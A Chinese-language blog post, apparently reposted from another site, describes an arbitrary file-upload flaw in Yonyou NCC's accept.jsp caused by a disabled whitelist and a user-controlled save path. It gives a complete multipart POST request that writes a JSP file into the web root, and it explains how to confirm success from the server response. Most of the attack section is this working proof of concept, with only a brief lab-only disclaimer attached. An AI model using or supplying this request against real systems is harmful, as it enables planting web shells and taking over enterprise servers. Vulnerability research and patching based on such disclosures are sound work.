漏洞原理
accept.jsp源碼中設(shè)置了白名單和黑名單的代碼,但是白名單代碼被注釋掉了(默認(rèn)被注釋)
只啟用了黑名單。文件保存的函數(shù)fname又被定義為可以隨便更改。
那可以上傳白名單內(nèi)的文件名,然后通過傳參將文件保存的名字進(jìn)行修改。以及修改文件位置
(具體源碼不能夠在平臺展示出)
漏洞靶場復(fù)現(xiàn)
以下復(fù)現(xiàn)常見均在靶場上進(jìn)行,請獲得授權(quán)后在開展?jié)B透

訪問頁面 http://ip:prot//aim/equipmap/accept.jsp
頁面存在存在 則表明漏洞可能能夠利用
通過POST發(fā)送數(shù)據(jù)包
POST /aim/equipmap/accept.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 370
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------16314487820932200903769468567
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
-----------------------------16314487820932200903769468567
Content-Disposition: form-data; name="upload"; filename="test.txt"
Content-Type: text/plain
win
-----------------------------16314487820932200903769468567
Content-Disposition: form-data; name="fname"
\webapps\nc_web\test.jsp
-----------------------------16314487820932200903769468567--

解析一下請求的意思
這里值得注意的是 因為安裝環(huán)境不同,所以可能會遇到保存的路徑不一致的情況,這時候需要猜測服務(wù)器的路徑。(但是默認(rèn)為POC中的路徑)
然后根據(jù)響應(yīng)包是否包含parent.afterUpload(1)來判斷文件是否上傳成功
上傳成功訪問文章來源:http://www.zghlxwxcb.cn/news/detail-476955.html

以上復(fù)現(xiàn)均在靶場上實(shí)現(xiàn)!網(wǎng)絡(luò)不是法外之地!請遵循中華人民共和國網(wǎng)絡(luò)安全法 文章來源地址http://www.zghlxwxcb.cn/news/detail-476955.html
到了這里,關(guān)于用友ncc accept.jsp漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!